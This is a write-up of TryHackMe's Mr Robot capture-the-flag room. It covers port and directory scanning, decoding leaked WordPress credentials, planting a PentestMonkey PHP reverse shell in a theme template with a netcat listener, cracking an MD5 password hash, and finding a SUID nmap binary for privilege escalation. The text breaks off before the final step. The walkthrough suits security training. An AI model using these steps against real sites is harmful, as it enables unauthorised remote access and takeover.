Mr Robot CTF on TryHackMe
Based on the Mr. Robot show, can you root this box?
TryHackMe is an amazing platform to learn cyber security and it’s an amazing asset if you are new to it and don’t know where to start. They have something called rooms that are basically vulnerable machines that you can deploy and practice your skills.
The best part about TryHackMe is that it’s pretty hands-on. If you are new to security, make sure you give it a try. In this article, we are going to solve the Mr Robot CTF from TryHackMe. This room has three flags to retrieve from the target. 🙂
Difficulty: Medium
- Connect to TryHackMe network
To deploy the Mr Robot virtual machine, we will first need to connect to the TryHackMe network. In this write-up, I am going to use the OpenVPN client to connect.
Go to your access page and download your configuration file.
After downloading the .ovpn file, now we can create our OpenVPN session.
sudo openvpn CONFIG_FILE_NAME.ovpnAfter running this command, you’ll get an output like below.
2021-xx-xx xx:xx:xx Initialization Sequence CompletedIt means that you have successfully connected to TryHackMe through the VPN connection. You can verify it by navigating to the TryHackMe access page.
Enough talks 🥱, let’s get started to hack. 🐱💻
2. Start the Machine
Now, click on the Start Machine button mentioned on TryHackMe task 2.
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱👤
Enumeration
As always, let’s start with the Nmap scan.
nmap -sC -sV 10.10.xxx.xxx-sC : Launch default NSE nmap scripts
-sV : Service fingerprinting
Here is the output 👇
Starting Nmap 7.91 ( https://nmap.org ) at 2021-xx-xx xx:xx EDT
Nmap scan report for 10.10.xxx.xxx
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.97 seconds
Nmap reveals 03 ports, 2 of which are opened (HTTP and HTTPS). And SSH seems to be closed.
Getting the first key
Now that we know the target is running a webserver, We should do a directory brute force scan to see what’s available. You can use gobuster or dirb but I like to use dirbuster. (In the following steps, I will show you how to do it through both dirbuster and gobuster)
Similar in concept to password brute-forcing we are taking a list of words contained in a file and using them as search queries against the webserver. If it returns a 20x or 30x status code then we know something is there.
Using dirbuster:
You can run dirbuster command on your terminal. It’ll open dirbuster GUI, and now you can enter target information to scan as follows.
After 3rd step, you can wait for the scan to be completed and eventually you can generate a report.
Using gobuster:
gobuster dir -u 10.10.xxx.xxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Even though these processes could take some time, if you prefer to see the hint on TryHackMe, then you can guess the file/path without putting much effort using a directory traversal tool.
However, Assisted by the hint, let’s go and see what’s inside the robots.txt file. It discloses 02 hidden files, 1 of which is key 1. (073xxxxxxxxxxxxxxxx)
The second file is a dictionary, that we will probably need to use for the discovery of other locations.
┌──(shehan㉿shehansanjula)-[~/TryHackMe/Mr Robot CTF]
└─$ curl -s http://10.10.xxx.xxx/fsocity.dic | head
true
false
wikia
from
the
now
Wikia
extensions
scss
windowGetting the second key
gobuster has discovered several locations, including:
- /login (Status: 302)
- /wp-content (Status: 301)
- /admin (Status: 301)
- /wp-login (Status: 200)
- /license (Status: 200)
- /wp-includes (Status: 301)
- /wp-admin (Status: 301)
By examining some directories, I find out the directory /license discloses some credentials:
curl -s http://10.10.xxx.xxx/license | tr -d "\n"tr -> translate or delete characters
-d -> delete characters in SET1, do not translate
\n -> new line
Here is the output 👇
Seems like we have base 64 encoded string. 🧐
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -dHere is the output 👇
elliot:ER28-0652If you have seen the Mr Robot TV series, probably you would have identified who that is. 🤖 Yeah, that’s Elliot!
Let’s check these credentials against WordPress login.
Well, it worked. 🤠 We just got access to the WordPress dashboard panel.
The WordPress version is 4.3.1. Considering the current version is 5.8.1, we are likely to find vulnerabilities.
After snooping around a bit, I found out Elliot is an administrator of this website. As we are administrators, we can modify the templates.
First download the script:
wget https://raw.githubusercontent.com/ShehanSanjula/php-reverse-shell/master/php-reverse-shell.phpGo to Appearance > Editor and edit the first template (404.php) by replacing the PHP code with a reverse shell taken from trusty PentestMonkey. Make sure you put your VPN interface IP
Type
ifconfig tun0and replace IP and port (you can specify any port you are using for the creation of your reverse TCP shell).
If you are using an Uncomplicated Firewall, remember to add a rule for your port.
After replacing 404 code, now hit update on WordPress. To listen to the connection, I always use the swiss army knife (netcat) tool. 👽
Now open a listener:
nc -lvnp 443-l -> listen mode
-v -> verbose
-n -> numeric-only IP addresses, no DNS
-p -> local port number
Now visit http://10.10.xxx.xxx/404.php to open the reverse shell.
We can see our next key in /home/robot but it is only readable by the robot user.
We are also provided with the MD5 hash of Mr Robot’s password:
$ cd /home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13bAfter reversing this MD5 hash, we can get the string abcdefghijklmnopqrstuvwxyz
It could be the associated password. So, let’s try to log in as robot.
$ su - robot
su: must be run from a terminalWell, we got an error… 😈 Fine, let’s check and confirm whether python is installed. So, then we can spawn a shell with python. 😇
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822xxxxxxxxxxxxxxxxxxxx
$
Getting the third key
Our last key is very likely in the /root directory, and we will need a privilege escalation to access it.
The Nmap scan reveals that port 22 (ssh) is closed, probably because the service is not started. We need to elevate our privileges.
Unfortunately, our user robot is not in the sudoers:
The
/etc/sudoersfile controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands.
$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyzSorry, user robot may not run sudo on linux.
$
No need to worry, let’s find what programs we have with the SETUID bit set owned by root:
$ find / -user root -perm -4000 -print 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Like I guess, Nmap is on the list (it’s also the hint btw). 😋
Besides, it’s a very old release (3.81), considering that the current release is 7.92 at the time of this writing.
$ which nmap
which nmap
/usr/local/bin/nmap
$ nmap --version
nmap --versionnmap version 3.81 ( http://www.insecure.org/nmap/ )
Nmap’s older release (2.02 to 5.21) had an interactive mode that allows executing commands.
However, Nmap has the SETUID bit set, which means that we will be able to run commands as root:
$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmapsetuid: a bit that makes an executable run with the privileges of the owner of the file
setgid: a bit that makes an executable run with the privileges of the group of the file
sticky bit: a bit set on directories that allows only the owner or root can delete files and subdirectories
Let’s play with Nmap’s interactive mode:
So, we came to the end of our article. Thank you and let’s meet with another article. Stay safe and Bye 👋.
You can find my articles from the Blog of Shehan as well. 👨💻
